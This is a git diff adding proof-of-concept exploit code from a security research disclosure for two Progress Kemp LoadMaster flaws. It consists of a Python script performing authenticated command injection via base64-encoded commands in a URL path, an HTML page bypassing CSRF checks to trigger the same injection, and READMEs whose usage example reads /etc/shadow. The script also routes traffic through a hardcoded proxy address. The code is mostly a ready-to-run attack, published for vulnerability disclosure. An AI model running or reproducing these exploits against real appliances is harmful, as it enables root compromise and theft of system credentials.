Add CVE-2024-2448 CVE-2024-2449

CVE-2024-2448/CVE-2024-2448.py

@@ -0,0 +1,60 @@
+# Exploit for CVE-2024-2448: authenticated command injection in Progress Kemp LoadMaster
+# Tested on: LoadMaster 7.2.59.2
+# Author: Dave Yesland @daveysec with Rhino Security Labs
+
+import argparse
+import base64
+import requests
+import urllib3
+from urllib3.exceptions import InsecureRequestWarning
+
+# Suppress only the InsecureRequestWarning from urllib3
+urllib3.disable_warnings(InsecureRequestWarning)
+
+
+def get_headers(host, sessionid):
+    return {
+        'Cookie': f'SESSIONID={sessionid}',
+        'Referer': f'{host}/progs/'
+    }
+
+
+def cleanup(cookie, host):
+    cleanup_cmd = 'sed -i "s/.*blahblah.*//g" /tmp/rrd/hist_graphs.env'
+    cleanup_cmd = f"$({cleanup_cmd})"
+    encoded_cmd = base64.b64encode(cleanup_cmd.encode()).decode()
+    url = f"{host}/progs/hg_cfg/add_rs/{encoded_cmd}"
+    requests.get(url, headers=get_headers(host, cookie), verify=False)
+
+
+def exec_command(cmd, cookie, host):
+    cmd = f"$({cmd} 1>&2)"
+    encoded_cmd = base64.b64encode(cmd.encode()).decode()
+    url = f"{host}/progs/hg_cfg/add_rs/{encoded_cmd}"
+    response = requests.get(url, headers=get_headers(host, cookie), verify=False, proxies={"https":"http://192.168.0.11:8080"})
+    print(get_cmd_output(response.text))
+    cleanup(cookie, host)
+
+
+def get_cmd_output(html_content):
+    start_tag = '<div id="_idb_" class="background">'
+    end_tag = '<div id="DRS">'
+    start_index = html_content.find(start_tag) + len(start_tag)
+    end_index = html_content.find(end_tag, start_index)
+    extracted_content = html_content[start_index:end_index].strip()
+    return extracted_content
+
+
+def main():
+    parser = argparse.ArgumentParser()
+    parser.add_argument('--url', type=str, help='https://HOST:PORT', required=True)
+    parser.add_argument('--cookie', type=str, help='Session cookie', required=True)
+    parser.add_argument('--cmd', type=str, help='Command to execute', required=True)
+
+    args = parser.parse_args()
+
+    exec_command(args.cmd, args.cookie, args.url)
+
+
+if __name__ == "__main__":
+    main()

CVE-2024-2448/README.md

@@ -0,0 +1,21 @@
+# CVE-2024-2448: Authenticated Command Injection in Progress Kemp LoadMaster
+
+## Information
+**Description:** This allows authenticated command execution as root on LoadMaster load balancers.  
+**Versions Affected:** LoadMaster 7.2.59.2  
+**Version Fixed:** See Vendor Advisory  
+**Researcher:** Dav Yesland (https://twitter.com/daveysec)  
+**Disclosure Link:** https://rhinosecuritylabs.com/research/cve-2024-2448-kemp-loadmaster/  
+**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2024-2448  
+**Vendor Advisory:** https://support.kemptechnologies.com/hc/en-us/articles/25119767150477-LoadMaster-Security-Vulnerabilities-CVE-2024-2448-and-CVE-2024-2449
+## Proof-of-Concept Exploit
+### Description
+This exploits an authenticated (with any permission settings) command injection in LoadMaster where user input is executed by an eval statement.  
+
+### Usage/Exploitation
+```
+python3 CVE-2024-2448.py --url 'https://LM_HOST:8443' --cookie 'AUTH_COOKIE' --cmd 'cat /etc/shadow'
+```  
+
+### Screenshot
+![Alt-text that shows up on hover](poc_image.png)

CVE-2024-2449/README.md

@@ -0,0 +1,20 @@
+# CVE-2024-2449: Cross-Site Requets Forgery in Progress Kemp LoadMaster
+
+## Information
+**Description:** This demonstrates a bypass in the CSRF protections of the Progress Kemp LoadMaster WUI.  
+**Versions Affected:**  7.2.59.2 
+**Version Fixed:** See vendor advisory.  
+**Researcher:** Dave Yesland (https://twitter.com/daveysec)  
+**Disclosure Link:** https://rhinosecuritylabs.com/research/cve-2024-2448-kemp-loadmaster/  
+**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2024-2449
+**Vendor Disclosure** https://support.kemptechnologies.com/hc/en-us/articles/25119767150477-LoadMaster-Security-Vulnerabilities-CVE-2024-2448-and-CVE-2024-2449  
+
+## Proof-of-Concept Exploit
+### Description
+This bypasses CSRF protections by serving the HTML file from the same directory as the targeted WUI page and including the referer. This bypasses the regex checks of the Referer header. 
+
+### Usage/Exploitation
+Serve the HTML file from the `/progs/hg_cfg` directory.  
+
+### Screenshot
+![Alt-text that shows up on hover](poc_image.gif)

CVE-2024-2449/progs/hg_cfg/CVE-2024-2449.html

@@ -0,0 +1,30 @@
+<!--
+Exploit for CVE-2024-2449: Cross-Site Request Forgery in Progress Kemp LoadMaster
+Tested on: LoadMaster 7.2.59.2
+Author: Dave Yesland @daveysec with Rhino Security Labs
+
+--> 
+<html>
+    <head>
+    <meta name="referrer" content="unsafe-url" />
+    </head>
+      <body>
+
+        <div id="adiv">
+        </div>
+
+            <script>
+            var target = 'https://TARGET_HOST';
+            var command = 'ls / 1>&2';
+            var enc_command = btoa('$('+command+')');
+            var url = target+"/progs/hg_cfg/add_rs/"+enc_command;
+
+            // Create a link and add it to 'adiv'
+            var link = document.createElement('a');
+            link.href = url;
+            link.textContent = 'Execute command: '+command;
+            document.getElementById('adiv').appendChild(link);
+        </script>
+      </body>
+    </html>
+